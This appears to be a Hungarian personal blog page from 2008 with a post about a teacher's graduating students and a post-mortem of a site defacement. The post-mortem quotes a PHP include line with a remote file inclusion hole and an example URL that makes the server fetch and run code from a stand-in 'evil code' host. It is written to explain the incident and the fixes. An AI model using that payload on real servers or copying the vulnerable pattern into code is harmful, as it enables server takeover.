links for 2008-05-30

2008. 05. 31. @ 00:31 | | 0 Komment | Edit

links for 2008-05-29

2008. 05. 30. @ 00:30 | | 0 Komment | Edit

3 tabló, 2 bankett meghívó, 1 szerenád

Ez az idei statisztika. A statisztika pedig szép is, jó is, de az adatok mögött mindig a lényeg veszik el. Kezdjük a végén, mert az a legfrissebb élmény. Tegnapelőtt itt járt az idei végzős Táncsicsos osztályom (egy része). Nagyon szépet énekeltek, s meghatódtam. Igen, szoktam ilyet csinálni. :-)

Éjfélhez közel járt már, mikor távoztak, s meg merem kockáztatni a kijelentést, hogy Ők is jól érezték Magukat nálunk. Bori is örült, hogy itt voltak, nem lehetett lelőni se, táncolt, puszikat osztott, rámolt, mosolygott, beszélt, s próbált mindenáron kibújni az aludni menés alól.

Aztán kaptam már két meghívást is bankettre, s a három tablóból, amin kómás fejjel beletekintek a nagyvilágba már kettőt láttam is.

Köszönöm Minden diákomnak, volt diákomnak, hogy taníthattam, s hogy kölcsönösen formáltuk egymást. Ha a tanár nem tanul a diáktól is, akkor ott baj van. Sokat tanultam mindhárom osztálytól, s remélem nekem is sikerült megszerettetnem Veletek a matematikát (de legalább egy pici részét).

2008. 05. 29. @ 07:15 | , , , and | 0 Komment | Edit

links for 2008-05-28

2008. 05. 29. @ 00:30 | | 0 Komment | Edit

ramil safarov

Nos, Ramil Safarov egy érdekes ember. Azonkívül, hogy sokan láthattátok hasonlatosságát Csányi Sándor ünnepelt szinészünknel, egy örmény társának életét vette egy baltával. Ennek ellenére, vagy éppen ezért Azerbajdzsánban az Év Embere lett.

Weboldala három nyelven köszönti az olvasókat, köztük magyarul is. Ennek oka gondolom az, hogy tudomásom szerint még mindig nálunk van fogva tartva. Naprakész információval nem rendelkezem, pedig igyekeztem utánajárni a dolognak.

A dolgot szőnyeg alá seperhettük volna, s hallgathatnék a hibáinkról, de úgy érzem jobb ide leírni, hogy mi is, s Ti is tanulhassatok belőle.

És most akkor a technikai bla-bla. A deface-t három dolog együttállásának köszönhettük. Egy nem éppen biztonságos php include parancsot az egyik domainen, illetve két kényelmi szolgáltatást kihasználva sikerült elérni, hogy önakaratunkon kívül sikerült betársulnunk Ramil szabadításáért küzdők népes táborába.

"include_once($_GET[oldal]."_".$_SESSION[lang].".php");" kód tanult kollégám szerint kiváló lehetőséget nyújt a rosszindulatú emberünknek, hogy a index.php?oldal=http://oldalam.com/gonosz-kodom.php?semmi= szöveg címsorba írása után http://oldalam.com/gonosz-kodom.php?semmi=_hu.php -t inklúdolja (mi erre a szép magyar szó), s lefuttassa. (a domain, illetve a kód tulajdonosát értesítettük, hogy javítsa ki, távolítsa azt el az oldalról.)

Ezzel emberünk a webszerver jogaival tudott fájlokat létrehozni. S valóban tudott is, mert kényelmi okokból sok domainen biztosítottuk az írásjogot. És, hogy a dolog még szebb legyen egy nemrég felkerült domain kedvéért létezett egy aldomain, amivel a teljes wwwroot bejárható volt. (megszüntettük az írásjogot, mindenkinek magának kell ezután engedélyezni, ha szeretné, hogy fel tudjon tölteni, stb. Az aldomaint szintén megszüntettük)

Tanulság: Kiskaput nem nyitunk, vagy ha igen, azonnal bezárjuk. A dolog előnye viszont, hogy íly módon minden cms a legfrissebbre lett upgrade-elve, ezzel csökkentve egy következő akció sikerességét. Frissült a teljes rendszer, minden, ami lehetett.

És akkor a végére az állandó kérdés, hogy mi a helyes arány a biztonság és a használhatóság között?

2008. 05. 28. @ 14:24 | , , , , , and | 4 Komment | Edit

links for 2008-05-26

2008. 05. 27. @ 00:31 | | 0 Komment | Edit

 1 2 3 4 Next →

További bejegyzések

Flickr & stuff

  • kitakarozva, fazva, alva
  • kitakarozva, fazva, alva
  • kitakarozva, fazva, alva
  • medveotthonban
  • dédivel
  • Bori & the cake

Tags

Last.fm